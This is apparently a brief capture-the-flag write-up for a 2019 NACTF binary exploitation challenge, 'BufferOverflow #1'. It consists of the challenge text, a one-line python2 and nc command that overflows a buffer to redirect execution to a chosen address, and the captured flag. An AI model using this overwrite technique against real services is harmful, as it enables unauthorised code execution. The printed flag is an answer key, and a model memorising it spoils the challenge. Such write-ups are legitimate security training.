BufferOverflow #1
Binary Exploitation - Points: 200
The close cousin of a website for “Question marked as duplicate” - part 2!
Can you redirect code execution and get the flag?
Connect at
shell.2019.nactf.com:31462
$ python2 -c 'print("A"*28+"\xb2\x91\x04\x08")' | nc ingress.cluster.nactf.com 31462
flag: nactf{pwn_31p_0n_r3t_iNylg281}